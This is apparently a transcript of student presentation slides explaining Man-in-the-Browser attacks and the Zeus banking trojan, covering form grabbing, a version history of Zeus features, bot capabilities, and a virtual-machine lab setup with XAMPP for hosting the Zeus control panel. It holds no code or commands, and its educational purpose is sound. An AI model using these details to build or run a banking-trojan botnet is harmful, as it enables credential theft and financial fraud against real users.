Man In The Browser
-
Upload
save-manos -
Category
Technology
-
view
841 -
download
0
description
Transcript of Man In The Browser
Man-In-The-Browser
Aras Tarhan Manos Dimogerontakis Mário Almeida Umit Buyuksahin
OUTLINE
● Man-in-the-Browser Attack● Method of Attack● Banking Trojans ● Zeus ● Zeus Installation● Zeus Configuration Files● DEMO
Man-in-the-Browser Attack
● Online phishers steal money from online customers● Online customers become target with more advanced
methods● One of the latest and most dangerous is Man-in-the-
Browser.● The malicious code modifies actions performed by the
computer users.● Then, steals confidential information● These attacks can not be detected by the user
Method of Attack● The trojan installs an extension into the browser configuration● Whenever a page is loaded, the URL of the page is searched by the
extension against a list of known sites targeted for attack.● When the handler detects a page-load for a specific pattern in its
targeted list.● When the submit button is pressed, the extension extracts all data
from all form fields.
Method of Attack (2)● The browser sends the form including the modified values to the
server.● The server receives the modified values in the form as normal
request. ● The server performs the transaction and generates a receipt.● The browser receives the receipt for the modified transaction
and displays the modified receipt with the original details.
Banking Trojans
A number of Trojan families are used to conduct MITB attacks. Some MITB Trojans are so advanced that they have streamlined the process for committing fraud, programmed with functionality to fully automate the process from infection to cash out.
Some known banking trojans:● Zeus● Sinowal (Torpig)● SpyEye● Carberp● Feodo● Tatanga● ...
ZEUS
● aim is to steal credentials of the victim● steals banking information by using Key
Stroke Logging and form grabbing methods● first appearance 2007, become widespread
2009 ( about 3.6 million in US )● targets only Microsoft Windows OS● used version: 2.0.8.9
Evolution of ZEUS
● Version 2.0.0.0, 01.04.2010○ full compatible with previous versions○ the installation process in the system was re-written to send
reports to the Control panel○ valuable work with x32 applications in Windows x64○ the name of the botnet is limited to 20 characters and can
contain any international characters ○ complete (as with wininet.dll) to work with nspr4.dll, but without
HTTP-fakes○ the configuration file is read in UTF-8 encoding
Evolution of ZEUS
● Version 2.0.1.0, 28.04.2010○ modified to bind to the user/OS○ minor improvements to HTTP-injects
● Version 2.0.2.0, 10.05.2010○ forced change of Mozilla Firefox security settings for normal
HTTP-injects● Version 2.0.3.0, 19.05.2010
○ in the configuration file, ■ added the option "StaticConfig.disable_tcpserver"■ added the option "StaticConfig.remove_certs"
○ in control panel, fixed a bug in the module "Botnet-> Bots"
Evolution of ZEUS
● Version 2.0.5.0, 08.06.2010○ fixed minor bugs in HTTP-grabber
● Version 2.0.6.0, 22.06.2010○ fixed an error resuting in disabling HTTP-injects
● Version 2.0.8.0, 17.08.2010○ to the parameters HTTP-injects was added a new option "I"
(compare URL insensitive) and "C" (comparison of context insensitive)
● Version 2.1.0.0, 20.03.2011○ RDP + VNC BACKCONNECT added to connect remotely to
the victim
Zeus - Capabilities
● gets OS info● does other things done by botnet scripts (like reboot,
shutdown, log off and kill OS)● takes screenshot● sends a script to be executed● searches files● all orders and states of them can be viewed on a control
panel in the server
Used Environments
● Virtual Machine
○ to add a significant layer of security and safety
○ both Server and Client to be hacked are installed on distinct Virtual Machines
○ used program: VirtualBox 4.1.6 for Windows hosts, Oracle○ each of them has two network adaptors, Host-only to
communicate between them and NAT for outside internet access
● Operating System○ used program: Windows XP Service Pack 3, Microsoft ○ since Zeus we get is able to be builded on Windows
● Server and Database○ to manage bots inside victims○ to receive the information from bots running on infected
clients○ to store the targeted data about the victim○ used program: XAMPP 1.7.7 including
■ Apache 2.2.21■ MySQL 5.5.16■ PHP 5.3.8■ phpMyAdmin 3.4.5
Used Environments
Zeus Installation
Demo